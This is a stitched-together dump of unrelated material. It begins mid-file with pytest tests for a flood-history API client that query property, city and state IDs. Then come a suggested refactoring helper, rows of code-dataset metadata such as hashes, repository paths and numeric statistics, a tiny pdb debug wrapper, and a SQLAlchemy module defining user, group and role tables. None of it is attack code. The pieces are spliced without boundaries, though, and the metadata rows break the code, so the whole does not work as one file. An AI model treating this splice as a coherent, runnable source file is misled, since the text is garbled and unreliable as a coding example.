assert historic[1].eventId == event_id[1]
assert not historic[1].properties
assert historic[0].valid_id is True
assert historic[1].valid_id is False
def test_one_of_each(self, tmpdir):
historic = fs.historic.get_event([2], csv=True, output_dir=tmpdir)
assert len(historic) == 1
assert historic[0].valid_id is True
assert historic[0].eventId == 2
assert historic[0].name is not None
assert historic[0].type is not None
assert historic[0].month is not None
assert historic[0].year is not None
assert historic[0].returnPeriod is not None
assert historic[0].properties is not None
assert historic[0].properties.get("total") is not None
assert historic[0].properties.get("affected") is not None
assert historic[0].geometry is not None
class TestHistoricSummary:
def test_empty(self):
with pytest.raises(InvalidArgument):
fs.historic.get_summary([], "")
def test_empty_fsid(self):
with pytest.raises(InvalidArgument):
fs.historic.get_summary([], "property")
def test_empty_type(self):
with pytest.raises(InvalidArgument):
fs.historic.get_summary([190836953], "")
def test_wrong_fsid_type(self):
with pytest.raises(InvalidArgument):
fs.historic.get_summary(190836953, "property")
def test_wrong_fsid_number(self):
fsid = [1867176]
historic = fs.historic.get_summary(fsid, "property")
assert len(historic) == 1
assert historic[0].fsid == fsid[0]
assert not historic[0].historic
assert historic[0].valid_id is False
def test_incorrect_lookup_type(self, tmpdir):
fsid = [190836953]
historic = fs.historic.get_summary(fsid, "city", csv=True, output_dir=tmpdir)
assert len(historic) == 1
assert historic[0].fsid == fsid[0]
assert not historic[0].historic
assert historic[0].valid_id is False
def test_wrong_historic_type(self):
with pytest.raises(TypeError):
fs.historic.get_summary([190836953], 190)
def test_single(self):
fsid = [190836953]
historic = fs.historic.get_summary(fsid, "property")
assert len(historic) == 1
assert historic[0].fsid == fsid[0]
assert historic[0].historic is not None
assert historic[0].valid_id is True
def test_multiple(self):
fsid = [190836953, 193139123]
historic = fs.historic.get_summary(fsid, "property")
assert len(historic) == 2
historic.sort(key=lambda x: x.fsid)
assert historic[0].fsid == fsid[0]
assert historic[0].historic is not None
assert historic[1].fsid == fsid[1]
assert historic[1].historic is not None
assert historic[0].valid_id is True
assert historic[1].valid_id is True
def test_single_csv(self, tmpdir):
fsid = [190836953]
historic = fs.historic.get_summary(fsid, "property", csv=True, output_dir=tmpdir)
assert len(historic) == 1
assert historic[0].fsid == fsid[0]
assert historic[0].historic is not None
assert historic[0].valid_id is True
def test_multiple_csv(self, tmpdir):
fsid = [190836953, 193139123]
historic = fs.historic.get_summary(fsid, "property", csv=True, output_dir=tmpdir)
assert len(historic) == 2
historic.sort(key=lambda x: x.fsid)
assert historic[0].fsid == fsid[0]
assert historic[0].historic is not None
assert historic[1].fsid == fsid[1]
assert historic[1].historic is not None
assert historic[0].valid_id is True
assert historic[1].valid_id is True
def test_mixed_invalid(self):
fsid = [190836953, 000000000]
historic = fs.historic.get_summary(fsid, "property")
assert len(historic) == 2
historic.sort(key=lambda x: x.fsid, reverse=True)
assert historic[0].fsid == fsid[0]
assert historic[0].historic is not None
assert historic[1].fsid == fsid[1]
assert not historic[1].historic
assert historic[0].valid_id is True
assert historic[1].valid_id is False
def test_mixed_invalid_csv(self, tmpdir):
fsid = [190836953, 000000000]
historic = fs.historic.get_summary(fsid, "property", csv=True, output_dir=tmpdir)
assert len(historic) == 2
historic.sort(key=lambda x: x.fsid, reverse=True)
assert historic[0].fsid == fsid[0]
assert historic[0].historic is not None
assert historic[1].fsid == fsid[1]
assert not historic[1].historic
assert historic[0].valid_id is True
assert historic[1].valid_id is False
def test_coordinate_invalid(self, tmpdir):
historic = fs.historic.get_summary([(82.487671, -62.374322)], "property", csv=True, output_dir=tmpdir)
assert len(historic) == 1
assert not historic[0].historic
assert historic[0].valid_id is False
def test_single_coordinate(self, tmpdir):
historic = fs.historic.get_summary([(40.7079652311, -74.0021455387)], "property", csv=True, output_dir=tmpdir)
assert len(historic) == 1
assert historic[0].historic is not None
assert historic[0].valid_id is True
def test_address_invalid_404(self, tmpdir):
historic = fs.historic.get_summary(["Shimik, Nunavut"], "property", csv=True, output_dir=tmpdir)
assert len(historic) == 1
assert not historic[0].historic
assert historic[0].valid_id is False
def test_address_invalid_500(self, tmpdir):
historic = fs.historic.get_summary(["Toronto, Ontario, Canada"], "property", csv=True, output_dir=tmpdir)
assert len(historic) == 1
assert not historic[0].historic
assert historic[0].valid_id is False
def test_single_address(self, tmpdir):
historic = fs.historic.get_summary(["247 Water St, New York, New York"], "property",
csv=True, output_dir=tmpdir)
assert len(historic) == 1
assert historic[0].historic is not None
assert historic[0].valid_id is True
def test_one_of_each(self, tmpdir):
historic = fs.historic.get_summary([511447411], "property", csv=True, output_dir=tmpdir)
assert len(historic) == 1
assert historic[0].valid_id is True
assert historic[0].fsid == 511447411
assert historic[0].historic is not None
assert historic[0].historic[0].get("eventId") is not None
assert historic[0].historic[0].get("name") is not None
assert historic[0].historic[0].get("type") is not None
assert historic[0].historic[0].get("depth") is not None
historic = fs.historic.get_summary([540225], "neighborhood", csv=True, output_dir=tmpdir)
assert len(historic) == 1
assert historic[0].valid_id is True
assert historic[0].fsid == 540225
assert historic[0].historic is not None
assert historic[0].historic[0].get("eventId") is not None
assert historic[0].historic[0].get("name") is not None
assert historic[0].historic[0].get("type") is not None
assert historic[0].historic[0].get("data") is not None
assert historic[0].historic[0].get("data")[0].get("bin") is not None
assert historic[0].historic[0].get("data")[0].get("count") is not None
historic = fs.historic.get_summary([1982200], "city", csv=True, output_dir=tmpdir)
assert len(historic) == 1
assert historic[0].valid_id is True
assert historic[0].fsid == 1982200
assert historic[0].historic is not None
assert historic[0].historic[0].get("eventId") is not None
assert historic[0].historic[0].get("name") is not None
assert historic[0].historic[0].get("type") is not None
assert historic[0].historic[0].get("data") is not None
assert historic[0].historic[0].get("data")[0].get("bin") is not None
assert historic[0].historic[0].get("data")[0].get("count") is not None
historic = fs.historic.get_summary([50156], "zcta", csv=True, output_dir=tmpdir)
assert len(historic) == 1
assert historic[0].valid_id is True
assert historic[0].fsid == 50156
assert historic[0].historic is not None
assert historic[0].historic[0].get("eventId") is not None
assert historic[0].historic[0].get("name") is not None
assert historic[0].historic[0].get("type") is not None
assert historic[0].historic[0].get("data") is not None
assert historic[0].historic[0].get("data")[0].get("bin") is not None
assert historic[0].historic[0].get("data")[0].get("count") is not None
historic = fs.historic.get_summary([19153004900], "tract", csv=True, output_dir=tmpdir)
assert len(historic) == 1
assert historic[0].valid_id is True
assert historic[0].fsid == 19153004900
assert historic[0].historic is not None
assert historic[0].historic[0].get("eventId") is not None
assert historic[0].historic[0].get("name") is not None
assert historic[0].historic[0].get("type") is not None
assert historic[0].historic[0].get("data") is not None
assert historic[0].historic[0].get("data")[0].get("bin") is not None
assert historic[0].historic[0].get("data")[0].get("count") is not None
historic = fs.historic.get_summary([19163], "county", csv=True, output_dir=tmpdir)
assert len(historic) == 1
assert historic[0].valid_id is True
assert historic[0].fsid == 19163
assert historic[0].historic is not None
assert historic[0].historic[0].get("eventId") is not None
assert historic[0].historic[0].get("name") is not None
assert historic[0].historic[0].get("type") is not None
assert historic[0].historic[0].get("data") is not None
assert historic[0].historic[0].get("data")[0].get("bin") is not None
assert historic[0].historic[0].get("data")[0].get("count") is not None
historic = fs.historic.get_summary([1901], "cd", csv=True, output_dir=tmpdir)
assert len(historic) == 1
assert historic[0].valid_id is True
assert historic[0].fsid == 1901
assert historic[0].historic is not None
assert historic[0].historic[0].get("eventId") is not None
assert historic[0].historic[0].get("name") is not None
assert historic[0].historic[0].get("type") is not None
assert historic[0].historic[0].get("data") is not None
assert historic[0].historic[0].get("data")[0].get("bin") is not None
assert historic[0].historic[0].get("data")[0].get("count") is not None
historic = fs.historic.get_summary([39], "state", csv=True, output_dir=tmpdir)
assert len(historic) == 1
assert historic[0].valid_id is True
assert historic[0].fsid == 39
assert historic[0].historic is not None
assert historic[0].historic[0].get("eventId") is not None
assert historic[0].historic[0].get("name") is not None
assert historic[0].historic[0].get("type") is not None
assert historic[0].historic[0].get("data") is not None
assert historic[0].historic[0].get("data")[0].get("bin") is not None
assert historic[0].historic[0].get("data")[0].get("count") is not None
class TestHistoricSummaryDetail:
def test_empty(self):
with pytest.raises(InvalidArgument):
fs.historic.get_events_by_location([], "")
def test_empty_fsid(self):
with pytest.raises(InvalidArgument):
fs.historic.get_events_by_location([], "property")
def test_empty_type(self):
with pytest.raises(InvalidArgument):
fs.historic.get_events_by_location([190836953], "")
def test_wrong_fsid_type(self):
with pytest.raises(InvalidArgument):
fs.historic.get_events_by_location(190836953, "city")
def test_wrong_fsid_number(self):
fsid = [11]
historic = fs.historic.get_events_by_location([11], "city")
assert len(historic[0]) == 1
assert len(historic[1]) == 1
assert historic[0][0].fsid == fsid[0]
assert not historic[0][0].historic
assert historic[0][0].valid_id is False
assert not historic[1][0].properties
        assert historic[1][0].valid_id is False
def test_incorrect_lookup_type(self, tmpdir):
fsid = [1982200]
historic = fs.historic.get_events_by_location(fsid, "state", csv=True, output_dir=tmpdir)
assert len(historic[0]) == 1
assert len(historic[1]) == 1
assert historic[0][0].fsid == fsid[0]
assert not historic[0][0].historic
assert historic[0][0].valid_id is False
assert not historic[1][0].properties
        assert historic[1][0].valid_id is False
def test_wrong_historic_type(self):
with pytest.raises(TypeError):
fs.historic.get_events_by_location([1982200], 190)
def test_single(self):
fsid = [1982200]
historic = fs.historic.get_events_by_location(fsid, "city")
assert len(historic[0]) == 1
assert len(historic[1]) == 1
assert historic[0][0].fsid == fsid[0]
assert historic[0][0].historic is not None
assert historic[0][0].valid_id is True
assert historic[1][0].properties is not None
        assert historic[1][0].valid_id is True
def test_multiple(self):
fsid = [1982200, 3905074]
historic = fs.historic.get_events_by_location(fsid, "city")
assert len(historic[0]) == 2
assert len(historic[1]) == 2
historic[0].sort(key=lambda x: x.fsid)
historic[1].sort(key=lambda x: x.eventId)
assert historic[0][0].fsid == fsid[0]
assert historic[0][0].historic is not None
assert historic[0][1].fsid == fsid[1]
assert historic[0][1].historic is not None
assert historic[1][0].properties is not None
assert historic[1][1].properties is not None
assert historic[0][0].valid_id is True
assert historic[1][0].valid_id is True
assert historic[0][1].valid_id is True
assert historic[1][1].valid_id is True
def test_single_csv(self, tmpdir):
fsid = [1982200]
historic = fs.historic.get_events_by_location(fsid, "city", csv=True, output_dir=tmpdir)
assert len(historic[0]) == 1
assert len(historic[1]) == 1
historic[0].sort(key=lambda x: x.fsid)
historic[1].sort(key=lambda x: x.eventId)
assert historic[0][0].fsid == fsid[0]
assert historic[0][0].historic is not None
assert historic[1][0].properties is not None
assert historic[0][0].valid_id is True
assert historic[1][0].valid_id is True
def test_multiple_csv(self, tmpdir):
fsid = [1982200, 3905074]
historic = fs.historic.get_events_by_location(fsid, "city", csv=True, output_dir=tmpdir)
assert len(historic[0]) == 2
assert len(historic[1]) == 2
historic[0].sort(key=lambda x: x.fsid)
historic[1].sort(key=lambda x: x.eventId)
assert historic[0][0].fsid == fsid[0]
assert historic[0][0].historic is not None
assert historic[0][1].fsid == fsid[1]
assert historic[0][1].historic is not None
assert historic[1][0].properties is not None
assert historic[1][1].properties is not None
assert historic[0][0].valid_id is True
assert historic[1][0].valid_id is True
assert historic[0][1].valid_id is True
assert historic[1][1].valid_id is True
def test_mixed_invalid(self):
fsid = [1982200, 000000000]
historic = fs.historic.get_events_by_location(fsid, "city")
assert len(historic[0]) == 2
assert len(historic[1]) == 1
historic[0].sort(key=lambda x: x.fsid, reverse=True)
historic[1].sort(key=lambda x: x.eventId, reverse=True)
assert historic[0][0].fsid == fsid[0]
assert historic[0][0].historic is not None
assert historic[0][1].fsid == fsid[1]
assert not historic[0][1].historic
assert historic[1][0].properties is not None
assert historic[0][0].valid_id is True
assert historic[1][0].valid_id is True
assert historic[0][1].valid_id is False
def test_mixed_invalid_csv(self, tmpdir):
fsid = [1982200, 000000000]
historic = fs.historic.get_events_by_location(fsid, "city", csv=True, output_dir=tmpdir)
assert len(historic[0]) == 2
assert len(historic[1]) == 1
historic[0].sort(key=lambda x: x.fsid, reverse=True)
historic[1].sort(key=lambda x: x.eventId, reverse=True)
assert historic[0][0].fsid == fsid[0]
assert historic[0][0].historic is not None
assert historic[0][1].fsid == fsid[1]
assert not historic[0][1].historic
assert historic[1][0].properties is not None
assert historic[0][0].valid_id is True
assert historic[1][0].valid_id is True
assert historic[0][1].valid_id is False
def test_coordinate_invalid(self, tmpdir):
historic = fs.historic.get_events_by_location([(82.487671, -62.374322)], "property",
csv=True, output_dir=tmpdir)
assert len(historic[0]) == 1
assert len(historic[1]) == 1
assert not historic[0][0].historic
assert historic[0][0].valid_id is False
assert not historic[1][0].properties
        assert historic[1][0].valid_id is False
def test_single_coordinate(self, tmpdir):
historic = fs.historic.get_events_by_location([(40.7079652311, -74.0021455387)], "property",
csv=True, output_dir=tmpdir)
assert len(historic[0]) == 1
assert len(historic[1]) == 1
assert historic[0][0].historic is not None
assert historic[0][0].valid_id is True
assert historic[1][0].properties is not None
        assert historic[1][0].valid_id is True
def test_address_invalid_404(self, tmpdir):
historic = fs.historic.get_events_by_location(["Shimik, Nunavut"], "property",
csv=True, output_dir=tmpdir)
assert len(historic[0]) == 1
assert len(historic[1]) == 1
assert not historic[0][0].historic
assert historic[0][0].valid_id is False
assert not historic[1][0].properties
        assert historic[1][0].valid_id is False
def test_address_invalid_500(self, tmpdir):
historic = fs.historic.get_events_by_location(["Toronto, Ontario, Canada"], "property",
csv=True, output_dir=tmpdir)
assert len(historic[0]) == 1
assert len(historic[1]) == 1
assert not historic[0][0].historic
assert historic[0][0].valid_id is False
assert not historic[1][0].properties
        assert historic[1][0].valid_id is False
def test_single_address(self, tmpdir):
historic = fs.historic.get_events_by_location(["247 Water St, New York, New York"], "property",
csv=True, output_dir=tmpdir)
assert len(historic[0]) == 1
assert len(historic[1]) == 1
assert historic[0][0].historic is not None
assert historic[0][0].valid_id is True
assert historic[1][0].properties is not None
        assert historic[1][0].valid_id is True
def test_one_of_each(self, tmpdir):
historic = fs.historic.get_events_by_location([511447411], "property", csv=True, output_dir=tmpdir)
assert len(historic[0]) == 1
assert len(historic[1]) == 2
assert historic[0][0].valid_id is True
assert historic[1][0].valid_id is True
assert historic[0][0].fsid == 511447411
assert historic[0][0].historic is not None
assert historic[0][0].historic[0].get("eventId") is not None
assert historic[0][0].historic[0].get("name") is not None
assert historic[0][0].historic[0].get("type") is not None
assert historic[0][0].historic[0].get("depth") is not None
assert historic[1][0].name is not None
assert historic[1][0].type is not None
assert historic[1][0].month is not None
assert historic[1][0].year is not None
assert historic[1][0].returnPeriod is not None
assert historic[1][0].properties is not None
assert historic[1][0].properties.get("total") is not None
assert historic[1][0].properties.get("affected") is not None
assert historic[1][0].geometry is not None
historic = fs.historic.get_events_by_location([540225], "neighborhood", csv=True, output_dir=tmpdir)
assert len(historic[0]) == 1
assert len(historic[1]) == 1
assert historic[0][0].valid_id is True
assert historic[1][0].valid_id is True
assert historic[0][0].fsid == 540225
assert historic[0][0].historic is not None
assert historic[0][0].historic[0].get("eventId") is not None
assert historic[0][0].historic[0].get("name") is not None
assert historic[0][0].historic[0].get("type") is not None
assert historic[0][0].historic[0].get("data") is not None
assert historic[0][0].historic[0].get("data")[0].get("bin") is not None
assert historic[0][0].historic[0].get("data")[0].get("count") is not None
assert historic[1][0].name is not None
assert historic[1][0].type is not None
assert historic[1][0].month is not None
assert historic[1][0].year is not None
assert historic[1][0].returnPeriod is not None
assert historic[1][0].properties is not None
assert historic[1][0].properties.get("total") is not None
assert historic[1][0].properties.get("affected") is not None
assert historic[1][0].geometry is not None
historic = fs.historic.get_events_by_location([1982200], "city", csv=True, output_dir=tmpdir)
assert len(historic[0]) == 1
assert len(historic[1]) == 1
assert historic[0][0].valid_id is True
assert historic[1][0].valid_id is True
assert historic[0][0].fsid == 1982200
assert historic[0][0].historic is not None
assert historic[0][0].historic[0].get("eventId") is not None
assert historic[0][0].historic[0].get("name") is not None
assert historic[0][0].historic[0].get("type") is not None
assert historic[0][0].historic[0].get("data") is not None
assert historic[0][0].historic[0].get("data")[0].get("bin") is not None
assert historic[0][0].historic[0].get("data")[0].get("count") is not None
assert historic[1][0].name is not None
assert historic[1][0].type is not None
assert historic[1][0].month is not None
assert historic[1][0].year is not None
assert historic[1][0].returnPeriod is not None
assert historic[1][0].properties is not None
assert historic[1][0].properties.get("total") is not None
assert historic[1][0].properties.get("affected") is not None
assert historic[1][0].geometry is not None
historic = fs.historic.get_events_by_location([50156], "zcta", csv=True, output_dir=tmpdir)
assert len(historic[0]) == 1
assert len(historic[1]) == 1
assert historic[0][0].valid_id is True
assert historic[1][0].valid_id is True
assert historic[0][0].fsid == 50156
assert historic[0][0].historic is not None
assert historic[0][0].historic[0].get("eventId") is not None
assert historic[0][0].historic[0].get("name") is not None
assert historic[0][0].historic[0].get("type") is not None
assert historic[0][0].historic[0].get("data") is not None
assert historic[0][0].historic[0].get("data")[0].get("bin") is not None
assert historic[0][0].historic[0].get("data")[0].get("count") is not None
assert historic[1][0].name is not None
assert historic[1][0].type is not None
assert historic[1][0].month is not None
assert historic[1][0].year is not None
assert historic[1][0].returnPeriod is not None
assert historic[1][0].properties is not None
assert historic[1][0].properties.get("total") is not None
assert historic[1][0].properties.get("affected") is not None
assert historic[1][0].geometry is not None
historic = fs.historic.get_events_by_location([19153004900], "tract", csv=True, output_dir=tmpdir)
assert len(historic[0]) == 1
assert len(historic[1]) == 2
assert historic[0][0].valid_id is True
assert historic[1][0].valid_id is True
assert historic[0][0].fsid == 19153004900
assert historic[0][0].historic is not None
assert historic[0][0].historic[0].get("eventId") is not None
assert historic[0][0].historic[0].get("name") is not None
assert historic[0][0].historic[0].get("type") is not None
assert historic[0][0].historic[0].get("data") is not None
assert historic[0][0].historic[0].get("data")[0].get("bin") is not None
assert historic[0][0].historic[0].get("data")[0].get("count") is not None
assert historic[1][0].name is not None
assert historic[1][0].type is not None
assert historic[1][0].month is not None
assert historic[1][0].year is not None
assert historic[1][0].returnPeriod is not None
assert historic[1][0].properties is not None
assert historic[1][0].properties.get("total") is not None
assert historic[1][0].properties.get("affected") is not None
assert historic[1][0].geometry is not None
historic = fs.historic.get_events_by_location([19163], "county", csv=True, output_dir=tmpdir)
assert len(historic[0]) == 1
assert len(historic[1]) == 1
assert historic[0][0].valid_id is True
assert historic[1][0].valid_id is True
assert historic[0][0].fsid == 19163
assert historic[0][0].historic is not None
assert historic[0][0].historic[0].get("eventId") is not None
assert historic[0][0].historic[0].get("name") is not None
assert historic[0][0].historic[0].get("type") is not None
assert historic[0][0].historic[0].get("data") is not None
assert historic[0][0].historic[0].get("data")[0].get("bin") is not None
assert historic[0][0].historic[0].get("data")[0].get("count") is not None
assert historic[1][0].name is not None
assert historic[1][0].type is not None
assert historic[1][0].month is not None
assert historic[1][0].year is not None
assert historic[1][0].returnPeriod is not None
assert historic[1][0].properties is not None
assert historic[1][0].properties.get("total") is not None
assert historic[1][0].properties.get("affected") is not None
assert historic[1][0].geometry is not None
historic = fs.historic.get_events_by_location([1901], "cd", csv=True, output_dir=tmpdir)
assert len(historic[0]) == 1
assert len(historic[1]) == 2
assert historic[0][0].valid_id is True
assert historic[1][0].valid_id is True
assert historic[0][0].fsid == 1901
assert historic[0][0].historic is not None
assert historic[0][0].historic[0].get("eventId") is not None
assert historic[0][0].historic[0].get("name") is not None
assert historic[0][0].historic[0].get("type") is not None
assert historic[0][0].historic[0].get("data") is not None
assert historic[0][0].historic[0].get("data")[0].get("bin") is not None
assert historic[0][0].historic[0].get("data")[0].get("count") is not None
assert historic[1][0].name is not None
assert historic[1][0].type is not None
assert historic[1][0].month is not None
assert historic[1][0].year is not None
assert historic[1][0].returnPeriod is not None
assert historic[1][0].properties is not None
assert historic[1][0].properties.get("total") is not None
assert historic[1][0].properties.get("affected") is not None
assert historic[1][0].geometry is not None
historic = fs.historic.get_events_by_location([39], "state", csv=True, output_dir=tmpdir)
assert len(historic[0]) == 1
assert len(historic[1]) == 4
assert historic[0][0].valid_id is True
assert historic[1][0].valid_id is True
assert historic[0][0].fsid == 39
assert historic[0][0].historic is not None
assert historic[0][0].historic[0].get("eventId") is not None
assert historic[0][0].historic[0].get("name") is not None
assert historic[0][0].historic[0].get("type") is not None
assert historic[0][0].historic[0].get("data") is not None
assert historic[0][0].historic[0].get("data")[0].get("bin") is not None
assert historic[0][0].historic[0].get("data")[0].get("count") is not None
assert historic[1][0].name is not None
assert historic[1][0].type is not None
assert historic[1][0].month is not None
assert historic[1][0].year is not None
assert historic[1][0].returnPeriod is not None
assert historic[1][0].properties is not None
assert historic[1][0].properties.get("total") is not None
assert historic[1][0].properties.get("affected") is not None
assert historic[1][0].geometry is not None
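The per-location checks above repeat the same field assertions for every summary/detail pair. A hedged sketch of a helper that collapses that pattern — the name `assert_event_fields` and the `SimpleNamespace` fakes are hypothetical, not part of the client under test:

```python
from types import SimpleNamespace

def assert_event_fields(summary, detail, fsid):
    # Hypothetical helper: summary plays the role of historic[0][0],
    # detail plays the role of historic[1][0] in the checks above.
    assert summary.valid_id is True
    assert summary.fsid == fsid
    first = summary.historic[0]
    for key in ("eventId", "name", "type", "data"):
        assert first.get(key) is not None
    assert first.get("data")[0].get("bin") is not None
    assert first.get("data")[0].get("count") is not None
    assert detail.valid_id is True
    for attr in ("name", "type", "month", "year", "returnPeriod", "geometry"):
        assert getattr(detail, attr) is not None
    assert detail.properties.get("total") is not None
    assert detail.properties.get("affected") is not None

# Minimal fake objects exercising the helper (example data only).
summary = SimpleNamespace(
    valid_id=True, fsid=39,
    historic=[{"eventId": 1, "name": "n", "type": "t",
               "data": [{"bin": 20, "count": 5}]}],
)
detail = SimpleNamespace(
    valid_id=True, name="n", type="t", month=9, year=2017,
    returnPeriod=100, geometry=object(),
    properties={"total": 10, "affected": 3},
)
assert_event_fields(summary, detail, 39)
```

Each `get_events_by_location` call could then be followed by a single helper call per summary/detail pair instead of ~18 repeated assertions.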
| 47.400572 | 118 | 0.633538 | 4,819 | 33,133 | 4.278896 | 0.029052 | 0.164985 | 0.180407 | 0.152764 | 0.980019 | 0.977837 | 0.971096 | 0.956499 | 0.954219 | 0.943598 | 0 | 0.057469 | 0.237437 | 33,133 | 698 | 119 | 47.468481 | 0.758648 | 0.004618 | 0 | 0.867717 | 0 | 0 | 0.033178 | 0 | 0 | 0 | 0 | 0 | 0.719685 | 1 | 0.075591 | false | 0 | 0.006299 | 0 | 0.086614 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
ce41674e5c98a507c67558dcd338e1389b3281cd | 59 | py | Python | src/goat/debug_utils.py | ethanweber/goat | b691f7ce3d6ed554fb7d85cb841607fc0283c5c8 | [
"MIT"
] | 2 | 2021-07-27T22:14:00.000Z | 2021-11-28T04:59:24.000Z | src/goat/debug_utils.py | ethanweber/goat | b691f7ce3d6ed554fb7d85cb841607fc0283c5c8 | [
"MIT"
] | 1 | 2021-07-28T23:28:53.000Z | 2021-07-28T23:28:53.000Z | src/goat/debug_utils.py | ethanweber/goat | b691f7ce3d6ed554fb7d85cb841607fc0283c5c8 | [
"MIT"
] | null | null | null |
import sys
import pdb
def set_trace():
    pdb.set_trace()
| 11.8 | 19 | 0.711864 | 10 | 59 | 4 | 0.6 | 0.4 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.186441 | 59 | 5 | 19 | 11.8 | 0.833333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | true | 0 | 0.5 | 0 | 0.75 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7
0239ced5c8efdbc28f15f88d56405ac406a6f575 | 4,431 | py | Python | dialogue-engine/src/programy/storage/stores/sql/dao/usergroup.py | cotobadesign/cotoba-agent-oss | 3833d56e79dcd7529c3e8b3a3a8a782d513d9b12 | [
"MIT"
] | 104 | 2020-03-30T09:40:00.000Z | 2022-03-06T22:34:25.000Z | dialogue-engine/src/programy/storage/stores/sql/dao/usergroup.py | cotobadesign/cotoba-agent-oss | 3833d56e79dcd7529c3e8b3a3a8a782d513d9b12 | [
"MIT"
] | 25 | 2020-06-12T01:36:35.000Z | 2022-02-19T07:30:44.000Z | dialogue-engine/src/programy/storage/stores/sql/dao/usergroup.py | cotobadesign/cotoba-agent-oss | 3833d56e79dcd7529c3e8b3a3a8a782d513d9b12 | [
"MIT"
] | 10 | 2020-04-02T23:43:56.000Z | 2021-05-14T13:47:01.000Z |
"""
Copyright (c) 2020 COTOBA DESIGN, Inc.
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
documentation files (the "Software"), to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software,
and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO
THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
"""
Copyright (c) 2016-2019 Keith Sterling http://www.keithsterling.com
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
documentation files (the "Software"), to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software,
and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the
Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO
THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
from sqlalchemy import Column, Integer, String
from programy.storage.stores.sql.base import Base
from programy.storage.stores.utils import DAOUtils
class AuthoriseUser(Base):
__tablename__ = 'authusers'
id = Column(Integer, primary_key=True)
name = Column(String(48))
def __repr__(self):
return "<AuthoriseUser(id='%s', name='%s')>" % (DAOUtils.valid_id(self.id), self.name)
class UserRole(Base):
__tablename__ = 'userroles'
id = Column(Integer, primary_key=True)
user = Column(String(48))
role = Column(String(48))
def __repr__(self):
return "<UserRole(id='%s', user='%s', role='%s')>" % (DAOUtils.valid_id(self.id), self.user, self.role)
class UserGroup(Base):
__tablename__ = 'usergroups'
id = Column(Integer, primary_key=True)
user = Column(String(48))
group = Column(String(48))
def __repr__(self):
return "<UserGroup(id='%s', user='%s', group='%s')>" % (DAOUtils.valid_id(self.id), self.user, self.group)
class AuthoriseGroup(Base):
__tablename__ = 'authgroups'
id = Column(Integer, primary_key=True)
name = Column(String(48))
parent = Column(String(48), nullable=True)
def __repr__(self):
return "<AuthoriseGroup(id='%s', name='%s', parent='%s')>" % (DAOUtils.valid_id(self.id), self.name, self.parent)
class GroupGroup(Base):
__tablename__ = 'groupgroups'
id = Column(Integer, primary_key=True)
group = Column(String(48))
subgroup = Column(String(48))
def __repr__(self):
return "<GroupGroup(id='%s', group='%s', subgroup='%s')>" % (DAOUtils.valid_id(self.id), self.group, self.subgroup)
class GroupRole(Base):
__tablename__ = 'grouproles'
id = Column(Integer, primary_key=True)
group = Column(String(48))
role = Column(String(48))
def __repr__(self):
return "<GroupRole(id='%s', group='%s', role='%s')>" % (DAOUtils.valid_id(self.id), self.group, self.role)
class GroupUser(Base):
__tablename__ = 'groupusers'
id = Column(Integer, primary_key=True)
group = Column(String(48))
user = Column(String(48))
def __repr__(self):
return "<GroupUser(id='%s', group='%s', user='%s')>" % (DAOUtils.valid_id(self.id), self.group, self.user)
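Each model above is a thin declarative mapping: an integer primary key plus `String(48)` columns. As an illustration only — using stdlib `sqlite3` rather than the project's SQLAlchemy engine/session setup — the `userroles` table the `UserRole` class maps has this shape:

```python
import sqlite3

def demo_userroles():
    # Same columns as the UserRole model above:
    # id (integer PK), user VARCHAR(48), role VARCHAR(48).
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE userroles ("
        "id INTEGER PRIMARY KEY, user VARCHAR(48), role VARCHAR(48))"
    )
    conn.execute(
        "INSERT INTO userroles (user, role) VALUES (?, ?)",
        ("keith", "admin"),  # example data, not taken from the project
    )
    row = conn.execute("SELECT id, user, role FROM userroles").fetchone()
    conn.close()
    return row

print(demo_userroles())  # (1, 'keith', 'admin')
```

With the real models, the equivalent insert would go through a SQLAlchemy session bound to `Base.metadata`; this sketch only shows the table shape the DAO assumes.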
